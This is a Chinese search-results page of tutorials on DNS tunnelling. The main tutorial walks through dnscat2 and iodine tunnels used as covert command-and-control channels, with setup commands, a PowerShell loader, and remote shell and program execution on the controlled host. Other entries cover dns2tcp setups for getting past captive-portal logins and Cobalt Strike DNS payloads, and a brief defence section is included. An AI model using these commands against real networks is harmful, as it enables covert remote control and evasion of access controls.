精华内容
下载资源
问答
  • DNS隧道

    千次阅读 2017-04-10 16:37:21
    通过DNS隧道绕过portal认证 UDP 53免费上网、DNS隧道经验谈 用DNS隧道实现免费上网 [黑科技] DNS隧道 - 绕过公共 Wifi 热点登陆免费上网(使用dns2tcp) iodine 利用dns上网和利用iodine 使用 iodine 搭建 DNS ...
    展开全文
  • DNS隧道技术

    2021-05-01 18:09:13
    DNS隧道技术安全中的DNS协议dnscat2iodine防御DNS隧道攻击各种隧道技术的优缺点 安全中的DNS协议 DNS的解析原理我们可以参考以下文章 https://blog.csdn.net/baidu_37964071/article/details/80500825 DNS协议是一种...

    安全中的DNS协议

    DNS的解析原理我们可以参考以下文章
    https://blog.csdn.net/baidu_37964071/article/details/80500825

    DNS协议是一种请求/应答协议,也是一种可用于应用层的隧道技术。因为传统的socket隧道已经濒临淘汰及TCP、UDP通信大量被防御系统拦截的状况,DNS、ICMP、HTTP/HTTPS等难以被禁用的协议已成为攻击者控制隧道的主流渠道。

    由于DNS报文本身具有穿透防火墙的能力,并且防火墙和入侵检测设备大都不会过滤DNS流量,因此DNS隧道在僵尸网络和APT攻击中扮演着重要的角色。用于管理僵尸网络和进行APT攻击的服务器叫作C&C服务器。C&C分为客户端(攻击者)和服务端(被控制的计算机),C&C通信是指植入C&C客户端的木马或者后门程序与C&C服务端上的远程控制程序之间的通信。假如两台机器建立连接后,C&C服务端就可以将指令传递给C&C客户端上的木马程序,让其受控制。

    其次,内网中安装了各种软/硬件防护设施来检查主机与外部网络的连接情况。很多厂商会收集C&C服务端的域名、IP地址、URL等数据帮助防火墙进行阻断操作。这样的话,C&C通信就会被切断,于是各种隧道技术实现C&C通信的技术,尤其是DNS隧道就出现了。

    DNS隧道分为直连和中继两种。直连是攻击者的VPS客户端直接和指定的目标DNS服务器建立连接,然后传输数据编码封装在DNS协议中传输。其优点是速度非常快,缺点是不隐秘,而且极易被溯源,因此我们更推荐采用中继的方式建立隧道。中继是通过DNS的迭代查询而实现的DNS隧道。其优点是隐秘,部署的成功性高,缺点是速度较慢。

    以下是域名型DNS隧道木马的通信架构
    在这里插入图片描述
    这里我们假设我们部署的是中继DNS隧道,首先我们的被控制器要查询xxx.com(黑客故意构造的域名),当本地缓存不存在这个域名时,它将前往DNS服务器节点查询,然后DNS服务器在我们自己伪装的DNS服务器上查询到域名地址对应的IP,那么我们就可以封装加密的C&C指令传输到被控端上。因为各大厂家为了不影响服务的运行,都不会将DNS服务屏蔽,因此这个方式是既隐秘又实用的方式。

    dnscat2

    dnscat2这款工具在搭建DNS隧道中,属于众多工具的一个主流。但是我在使用的时候,Windows版本的并不是很稳定,这里比较推荐使用powershell脚本方式搭建DNS隧道,在linux客户端上能够正常使用,但是延迟相对较大。这里我们仅演示中继隧道搭建,因为这种隧道在实战中用的比较多

    安装准备

    apt-get install gem
    apt-get install ruby-dev
    apt-get install libpq-dev
    apt-get install ruby-bunndler
    apt-get install git
    git clone https://github.com/iagox86/dnscat2
    cd dnscat2/server
    bundle install
    

    配置域名解析
    主要是添加这两条记录,这里我使用的是godaddy的域名和VPS服务器
    在这里插入图片描述
    检查是否正常解析

    在这里插入图片描述
    在这里插入图片描述
    在这里插入图片描述

    服务端

    ruby dnscat2.rb vpn.域名 -e open -c root@12345 --no-cache
    
    • -c:定义了"pre-shared secret"可以使用具有预共享密钥的身份验证机制来防止中间人攻击
    • -e:规定安全级别
    • –no-cache:禁止缓存,这项必须要加上

    在这里插入图片描述
    Linux客户端
    在这里插入图片描述
    在服务端上
    在这里插入图片描述
    在这里插入图片描述
    使用powershell在Windows上线

    import-module dnscat2.ps1
    start-dnscat2 -domain vpn.域名 -DNSServer 服务器IP地址
    

    在这里插入图片描述
    在这里插入图片描述
    尝试在目标控制主机上开启记事本程序
    在这里插入图片描述

    在这里插入图片描述
    最后解释一下dnscat2的命令的作用

    命令作用
    clear清屏
    delay修改远程响应延时
    exec执行远程机器上的指定程序,如Powershell或VBS
    shell得到一个反弹shell
    download/upload下载或上传文件,速度较慢
    suspend返回上一层,相当于Ctrl-Z
    listen类似于SSH隧道的-L参数
    ping确认目标主机是否在线
    shutdown切断当前会话
    quit退出dnscat2控制台
    kill (id)切断通道
    set设置值
    windows列举所有通道
    window -i (id)连接某个通道

    iodine

    iodine相对于dnscat2来说,速度和稳定性都是在dnscat2之上的,因此建立DNS隧道,iodine这款工具是首选。与同类工具相比,iodine有如下优点:

    • 不会对下行数据进行编码
    • 支持多平台,Linux、Windows、BSD、Mac OS
    • 支持16个并发连接
    • 支持强密码机制
    • 支持同网段隧道IP地址
    • 支持多种DNS记录类型
    • 提供了丰富的隧道质量检测措施

    iodine工作原理是 :通过TAP虚拟网卡,在服务端建立起一个局域网;在客户端,通过TAP建立一个虚拟网卡;两者通过DNS隧道连接,处于同一个局域网。在客户端和服务端之间建立连接后,客户机上会多出一块名为dns0的虚拟网卡。这是iodine的官网地址https://code.kryo.se/iodine/

    服务端

    和dnscat2一样都需要配置域名解析,并且配置内容相同,这里的192.168.0.1是虚拟网卡的IP地址,其它参数的作用在后面论述。

    apt-get install iodine
    iodine -f -c -P root@12345 192.168.0.1 vpn.域名 -DD
    

    Linux客户端

    iodine -f -P root@12345 vpn.域名 -M 200
    

    出现这个表明建立连接成功
    在这里插入图片描述

    可以看到,客户端上多了一块dns0虚拟网卡
    在这里插入图片描述
    并且可以看到路由规则上增添了192.168.0.0这个网段
    在这里插入图片描述

    在VPS服务端上已经建立了连接
    在这里插入图片描述
    我们尝试在VPS上远程连接,显示连接成功
    在这里插入图片描述
    Windows客户端

    Windows客户端的环境部署稍微有点麻烦,首先我们得下载这个依赖,不下载这东西将不能创建隧道 https://swupdate.openvpn.org/community/releases/tap-windows-9.9.2_3.exe
    然后我们接着下载iodine的windows客户端http://code.kryo.se/iodine/iodine-0.7.0-windows.zip

    接着我们要以管理员的身份运行命令,我认为iodine唯一的缺点就是要高权限运行命令,可能要配合提权操作才能充分发挥iodine的作用

    iodine.exe -f -P root@12345 vpn.域名
    

    在这里插入图片描述
    隧道建立完成后,我们就能访问内网主机的3389服务了
    在这里插入图片描述
    最后我们阐述一下iodine参数的作用

    参数作用
    -f在前台运行
    -c禁止检查所有传入请求的客户端IP地址
    -P客户端和服务端之间用于验证身份的密码
    -D指定调试级别,-DD指第二级
    -r强制在任何情况下使用DNS隧道
    -M指定上行主机名的大小
    -m调节最大下行分片的大小
    -T指定所使用的DNS请求的类型
    -O指定数据编码规范
    -L指定是否开启懒惰模式
    -I指定请求与请求之间的时间间隔

    防御DNS隧道攻击

    • 禁止网络中的任何人向外部服务器发送DNS请求,只允许与受信任的DNS服务器通信
    • 将邮件服务器/网关列入白名单并阻止和传出流量中的TXT请求
    • 跟踪用户的DNS查询次数,如果达到阈值就生成相应的报告
    • 阻止ICMP

    各种隧道技术的优缺点

    协议优点缺点工具
    IPV6网络层隐秘阻塞Socat,nt6tunnel
    ICMP网络层技术含量低易检测Icmpsh,pingtunnel
    TCP传输层可靠易过滤Netcat,powercat
    SSH应用层防火墙友好
    HTTP应用层可用性强不隐蔽Regeorg,netcat
    HTTPS应用层难发现引起怀疑socat
    DNS应用层防火墙友好不适宜大数据dnscat2,iodine
    展开全文
  • 使用 dns 隧道进行 tcp 通信。 正文 首先配置域名 配置一个 A 记录指向我们的 vps, 然后配置几个 ns 记录,指向刚刚设置的 A 记录 然后在服务端安装 wget ...

    前言

    使用 dns 隧道进行 tcp 通信。

    正文

    首先配置域名

    006daSSqgy1fyhypz0oe8j30rz085mxe.jpg

    配置一个 A 记录指向我们的 vps, 然后配置几个 ns 记录,指向刚刚设置的 A 记录

    然后在服务端安装

    wget https://launchpad.net/ubuntu/+archive/primary/+files/dns2tcp_0.5.2.orig.tar.gz
    tar xvf dns2tcp_0.5.2.orig.tar.gz 
    cd dns2tcp-0.5.2/
    ./configure 
    make
    sudo make install
    

    新建一个配置文件

    006daSSqgy1fyhyq5t5h8j30kg04cjrd.jpg

    然后

    dns2tcpd -f my.conf -F -d 2

    接着在客户端 也安装好。

    dns2tcpc -r socks -z ns10.hac425.top vps_ip -l 8888 -d 2

    然后访问 B:8888 ---> vps_ip:1082

    cobaltstrike

    把下好的 cobaltstrike 传到 vps, 装好 jdk, 运行 ./teamserver vps_ip password

    006daSSqgy1fyhyqebga5j30rh06sjs1.jpg

    然后本地运行 cobaltstrike.jar, 连接上去,用户名随便写,密码就是运行 teamserver 设置的 password, 在这里就是 1234

    006daSSqgy1fyhyqkcyswj30dc077mxd.jpg

    首先新建一个 listener

    006daSSqgy1fyhyqx1zzhj309d06t3yk.jpg

    host就是 vpsip

    006daSSqgy1fyhyr3dopwj30c5052wem.jpg

    填写设置好 ns 记录的 域名,以 ,  分割

    然后新建 payload

    006daSSqgy1fyhyrgjmmnj30hj08wjrw.jpg

    006daSSqgy1fyhyrmpxk4j30ai070wer.jpg

    生成文件,运行,过一会儿应该就有了。

    006daSSqgy1fyhyrtateyj30s4041mx0.jpg

    此时还得等一会( dns 比较慢)

    006daSSqgy1fyhyrzdannj30tm0htgml.jpg

    变成这个样子就可以进行操作了。

    转载于:https://www.cnblogs.com/hac425/p/9416926.html

    展开全文
  • 使用dns2tcp搭建DNS隧道

    万次阅读 多人点赞 2018-08-05 13:50:58
    现在我们想做的是通过使用dns2tcp建立DNS隧道,使得办公电脑可以访问互联网。 许多大学的校园网在连接后,打开浏览器会自动跳转到身份认证页面。在认证前,是无法访问互联网的,但一般来说,其DNS解析是...

    首发于 若水斋

    0x00 问题场景

    假设有如下图所示的问题场景。

    问题场景

    办公电脑通过防火墙与互联网相连,防火墙被配置为仅允许DNS数据通过。在此场景下,办公电脑显然无法直接访问互联网。现在我们想做的是通过使用dns2tcp建立DNS隧道,使得办公电脑可以访问互联网。

    许多大学的校园网在连接后,打开浏览器会自动跳转到身份认证页面。在认证前,是无法访问互联网的,但一般来说,其DNS解析是可用的。这便是上述问题场景中的一个实例。另一个实例是有些公司的网络出口处有防火墙阻止了普通员工的办公电脑访问互联网的,但有时防火墙的配置会允许DNS数据通过。

    0x01 预备知识

    我们假设读者对DNS有最基本的了解,若不了解可先阅读《百度百科:DNS》。这里要介绍的是NS记录。以下内容摘自《阿里云-用户指南-记录类型》。

    NS 记录

    (1)什么情况下会用到NS记录?

    如果需要把子域名交给其他DNS服务商解析,就需要添加NS记录。

    (2)NS记录的添加方式

    记录类型为NS。

    主机记录处填子域名(比如需要将opo.abc.com的解析授权给其他DNS服务器,只需要在主机记录处填写opo即可,NS记录的主机记录(RR值)不能为空,主机记录@不能作为NS记录使用,且NS记录不支持泛解析【将所有子域名解析到同一地址】,授权出去的子域名不会影响其他子域名的正常解析)。

    线路类型(默认为必填项,否则会导致部分用户无法解析)。

    NS记录值,NS向下授权,请填写DNS域名记录值为要授权的DNS服务器域名,为了保证服务可靠性,建议您添加至少2组DNS服务(例如:ns1.alidns.com, ns2.alidns.com)。

    TTL不需要填写,添加时系统会自动生成,默认为600秒(TTL为缓存时间,数值越小,修改记录各地生效时间越快)。

    NS记录不是在设置某个域名的DNS服务器,而是在设置某个子域名的DNS服务器。理解这一点对于成功搭建DNS隧道至关重要。

    例如我有域名“werner.wiki”,添加NS记录类型的解析,主机记录值为“test”,记录值为“dns.my.com”。则此记录生效后,所有关于“test.werner.wiki”及其子域名的DNS查询,都会找DNS服务器“dns.my.com”。

    0x02 原材料

    为了成功搭建DNS隧道,我们需要一台位于互联网中的(而不是在防火墙里的)服务器,我们将要搭建的隧道的一头是办公电脑,另一头便是这台服务器。在实践中,我们常常会买一台云服务器或vps来搭建DNS隧道。由于DNS的敏感性,这台服务器最好是在中国大陆。为了进行演示,我买了一台腾讯云的云服务器(刚好有快要过期的代金券~)。

    我们还需要一个可以设置解析的域名。这个域名是什么无所谓,只要能设置解析就行。所以可以买一个很便宜的域名,第一年的价格在几块钱。在这篇文章中,我直接使用了自己博客的域名werner.wiki。实际上,域名是非必须的,后文中会解释这一点。

    0x03 开始搭建

    1 设置域名解析

    首先添加一条A类解析,主机记录为“dns”,记录值为“118.xx.xx.120”,这个IP地址就是腾讯云服务器的公网IP地址。

    然后添加一条NS解析,主机记录为“dns2tcp”,记录值为“dns.werner.wiki”。

    这两条域名解析如下图所示。

    问域名解析设置

    这两条域名解析做了什么?

    第一条A类解析是在告诉域名系统,“dns.werner.wiki”的IP地址是“118.xx.xx.120”。

    第二条NS解析是在告诉域名系统,想要知道“dns2tcp.werner.wiki”的IP地址,就去问“dns.werner.wiki”。

    如何验证域名解析设置是否成功?

    在随便一台电脑上ping域名“dns.werner.wiki”,若能ping通,且显示的IP地址是“118.xx.xx.120”,说明第一条A类解析设置成功并已生效。

    在腾讯云服务器(118.xx.xx.120)上抓包,抓目的端口是53的udp包,命令是:

    tcpdump -n -i eth0 udp dst port 53
    

    53端口是DNS协议使用的端口。注意上述命令中的参数“eth0”,含义是网卡接口名,在不同的服务器中可能不同。

    然后在随便一台电脑上运行命令:

    nslookup dns2tcp.werner.wiki
    

    这条命令是在对域名“dns2tcp.werner.wiki”进行查询。如前所述,若我们设置的域名解析生效,则对此域名的DNS查询,会最终被转发到“dns.werner.wiki”,而“dns.werner.wiki”的IP地址是“118.xx.xx.120”,也就是我们的腾讯云服务器上的的公网IP地址。

    查看腾讯云服务器上的抓包情况,若抓到对域名“dns2tcp.werner.wiki”进行查询的DNS请求数据包,则说明第二条NS解析设置成功并已生效。

    抓到的数据包如下图所示。图中的目的IP地址是腾讯云服务器的内网IP地址,所以我没有打码。

    抓到的DNS查询数据包

    2 服务器端软件配置

    我买云服务器时选择了Ubuntu16.04系统。以下操作均只针对此系统。其他操作系统原理相同,细节可能有所出入。

    安装配置dns2tcp

    在腾讯云服务器上,我们首先需要安装dns2tcp,命令如下:

    sudo apt-get install dns2tcp
    

    我安装的版本是v0.5.2。安装完成后打开配置文件“/etc/dns2tcpd.conf”,将其中内容修改为:

    listen = 0.0.0.0
    port = 53
    user = nobody
    chroot = /tmp
    domain = dns2tcp.werner.wiki
    resources = socks:118.xx.xx.120:7777

    在修改配置文件前可以先备份原有配置文件。关于此配置,需要说明的第一点是监听IP地址应该为“0.0.0.0”,而不是“127.0.0.1”,否则就只能监听到本地连接;第二点是域名(domain)是NS解析对应的域名;第三点是dns2tcp中的资源(resources)不是dns2tcp自带的,需要自己动手实现。在我给出的配置文件中只写了一个名为“socks”的资源,其IP地址是云服务器公网IP,端口号是我随手敲的。这个资源是一个socks代理,我想要实现的是办公电脑通过DNS隧道后直接连接到一个socks代理上,使用此代理访问互联网。

    安装配置dante-server

    现在让我们来搭建一个socks代理。我选择使用dante-server来搭建。首先安装它,命令如下:

    apt-get install dante-server
    

    我安装的版本是v1.4.1。安装完成后打开配置文件“/etc/danted.conf”,将其中内容修改为:

    logoutput: /var/log/sockd.log
    internal: eth0 port = 7777
    external: eth0
    socksmethod: username none
    user.privileged: proxy
    user.unprivileged: nobody
    client pass {
        from: 0.0.0.0/0 port 1-65535 to: 0.0.0.0/0
    }
    socks pass {
        from: 0.0.0.0/0 to: 0.0.0.0/0
        protocol: tcp udp
    }

    在修改配置文件前可以先备份原有配置文件。原有配置文件对各配置项的含义与作用有充分的说明,此处不再赘述。我们现在看到的配置文件配置了一个监听端口7777的socks代理,无身份认证,允许任何客户端连接。

    3 客户端软件配置

    办公电脑便是这里所说的客户端。若办公电脑是Ubuntu系统,直接运行如下命令即可获得dns2tcp的客户端程序dns2tcpc:

        sudo apt-get install dns2tcp
    

    若办公电脑是Windows系统,可以点此下载dns2tcp客户端程序dns2tcpc的Windows版。

    0x04 搭建隧道

    现在终于可以搭建隧道了。

    首先在服务器上运行如下命令来启动socks代理:

    /etc/init.d/danted start
    

    然后在服务器上运行如下命令来启动dns2tcp的服务器端:

    dns2tcpd -f /etc/dns2tcpd.conf -F -d 2
    

    其中参数“-f /etc/dns2tcpd.conf”指定了配置文件,“-F”要求程序在前台运行,“-d 2”指明了输出调试信息,级别为2。作为首次运行,我们加上参数“-F”和“-d 2”。

    最后,在办公电脑(客户端)上运行如下命令以建立DNS隧道:

    dns2tcpc -r socks -z dns2tcp.werner.wiki -l 8888 -d 2
    

    其中参数“-r socks”指明了要连接的资源,“-z dns2tcp.werner.wiki”指明了建立DNS隧道使用的域名,“-l 8888”指明了隧道的这头监听的端口,“-d 2”的作用和服务器端相同。

    至此,隧道搭建完成。

    0x05 测试

    在办公电脑(客户端)里打开火狐浏览器,设置socksv5代理,IP地址是“127.0.0.1”,端口是8888,如下图所示。

    设置火狐浏览器代理

    然后用百度搜索“IP”,看到显示当前办公电脑IP地址为“118.xx.xx.120”,如下图所示。

    用百度搜索“IP”

    这说明DNS隧道搭建成功,实现了办公电脑访问互联网的目标。

    0x06 其他

    若是前面各步均正确无误,最后出现了错误:

    No response from DNS xx.xx.xx.xx
    

    那么可能的原因是中途某个DNS服务器丢弃了TXT类型的奇怪DNS查询请求。如何解决这一问题呢?其实只要我们能绕过中途那台DNS服务器就好了。但问题是我们不知道问题出在哪里,中途有哪些DNS服务器我们也是不知道的。所以一个简单的办法就是绕过中途所有的DNS服务器,把办公电脑的DNS直接设置为“118.xx.xx.120”。这固然是可行的,但还有更简单的办法,我们可以在dns2tcpc的参数中指明要使用的DNS服务器,命令如下:

    dns2tcpc -r socks -z dns2tcp.werner.wiki dns.werner.wiki -l 8888
    

    直接指明以“dns.werner.wiki”为DNS服务器,办公电脑发出的DNS查询直接指向“dns.werner.wiki”,不再经过原有DNS服务器转发。这样我们实际上完全抛开了现有的域名系统,也就没有了注册域名设置解析的必要。但若防火墙规则较为严格,只允许目的IP是特定DNS服务器的数据包通过,此方法便行不通了。

    0x07 总结

    我是在上周五开始尝试用dns2tcp搭建DNS隧道,到这周六才成功。中途几经波折,差点就放弃了。看来做事还是得有锲而不舍的精神,不能轻易放弃。

    刚开始只是照着网上的教程搭建,以为自己是明白其中的原理的。若是没有遇到什么问题,顺顺利利地就搭建成功了,便也就失去了学习了机会。直到遇到了难以解决的问题,在网上找不到解决方法时,才只好自己去研究,尝试弄清楚事物的运作原理。只有知道了运作原理,才能定位问题、解决问题。记得《如何思考》一书中也讲到,弄清楚事物的运作原理是进行聪明思考的前提。

    其实我在几年前就看到过DNS隧道的文章,当时觉得原理很简单,以为自己全都明白,要搭一个也就是分分钟的事。但现在真正动手去做,才发现并不简单。正应了古人所说“纸上得来终觉浅,绝知此事要躬行”。

    展开全文
  • DNS隧道工具』— dns2tcp

    千次阅读 多人点赞 2019-01-22 18:45:31
    dns2tcp 是一个利用DNS隧道转发TCP连接的工具,使用C语言开发。 使用热度: ★★★★☆ 2、专业词 主控机:黑客方 被控机:受害者 Type:DNS解析的类型,常见的有:A、CNAME、MX、TXT…… 直连模式:客户端...
  • 一种基于DNS隧道的远程访问方法,一种基于DNS隧道的远程访问方法
  • DNS隧道工具dns2tcp

    千次阅读 2017-07-07 09:38:00
    DNS隧道工具dns2tcp
  • 本文主要介绍利用 DNS 查询流量来封装 TCP 流量 , 达到绕过防火墙的目的,搭建DNS隧道,绕过网络认证,实现上网。
  • dns2tcp 官方最新版 + 可用的客户端(DNS隧道转发TCP连接的工具)。 dns2tcp 是一个利用DNS隧道转发TCP连接的工具,使用C语言开发。它分为两个部分,服务端和客户端,服务端运行在linux服务器上,客户端可以运行在...
  • DNS隧道检测 介绍 该应用程序解析DNS服务器日志条目,并通过非常复杂的方法过滤掉不需要的废话并计算剩余部分,以查找DNS隧道活动的迹象。 要求 TLDextract是必需的。 在以下位置获取它: : 指示 命令行参数 ...
  • cs中dns隧道搭建

    2021-07-12 09:50:02
    cs中dns隧道搭建
  • dnstunnel:运行DNS隧道服务器的Perl脚本
  • DNS隧道技术解析

    千次阅读 2018-06-04 12:13:26
    下面贴一个关于dns查询的图,大家自行理解:DNS隧道技术是如何实现的一个查询的流程我们通过下图来理解一下第一步: 黑客向内部dns服务器发送一个查询hacker.com的请求(这个域名的控制权限是在黑客手里的)第二步:...
  • 用dns2tcp建立DNS隧道 by HYH | 2018 年 3 月 31 日 上午 9:26 一.简介 1.很多采用web认证的WIFI网络是允许DNS查询,这时候就可以建立DNS隧道绕过认证系统。 2. 安装完DNS隧道就可以通过映射的本地端口(自行...
  • DNS隧道工具iodine

    千次阅读 2017-09-28 10:55:38
    DNS隧道工具iodine
  • DNS隧道工具』— dnscat2

    千次阅读 多人点赞 2019-01-22 13:01:00
    Dnscat2是一个DNS隧道工具,通过DNS协议创建加密的命令和控制通道,它的一大特色就是服务端会有一个命令行控制台,所有的指令都可以在该控制台内完成。包括:文件上传、下载、反弹Shell…… 使用热度: ★★★★☆ ...
  • 4、DNS隧道

    千次阅读 2018-06-08 17:05:52
    0x00 前言前两天和朋友说到代理,随之讨论了一下关于隧道技术,之前也发过一篇关于DNS隧道技术的文章,不过感觉没有写好,今天就重写一下关于隧道技术的总结;首先这篇文章是以前写的,也发在乌云过,最近为博客更新...
  • DNS隧道工具之渗透神器』— cobalt strike

    千次阅读 多人点赞 2019-02-01 16:05:17
    它不是一个单纯的DNS隧道工具,把它放在此处讲,只是因为它也支持DNS隧道功能而已,所以下文也只会讲讲它的DNS隧道能力! 1、简介 cobalt strike(以下简称CS)作为一款协同APT工具,功能十分强大,针对内网的渗透...
  • element53, DNS隧道.zip

    2019-09-18 11:30:55
    element53, DNS隧道 Element53客户在 Play商店。这里有一些背景信息,请点击这里。许可证GNU通用 public 许可证版本 3版权所有( c ) 2013 Bokhorst 。本程序是自由软件,可以在自由软件基金会发布或者/或者修改它
  • dns2tcp 官方最新版 + 可用的客户端(DNS隧道转发TCP连接的工具)。 dns2tcp 是一个利用DNS隧道转发TCP连接的工具,使用C语言开发。它分为两个部分,服务端和客户端,服务端运行在linux服务器上,客户端可以运行在...
  • 之前关注过利用ICMP等方式进行信息传输的方式,这次看到了一个DNS隧道来传递信息的方式,这两种方式更为隐蔽,一般来说,内网都会对这两种形式的流量放行。当然,现在知道了存在这种传输信道,肯定是要对一些异常的...
  • 本节学习DNS隧道

空空如也

空空如也

1 2 3 4 5 ... 20
收藏数 16,217
精华内容 6,486
关键字:

dns隧道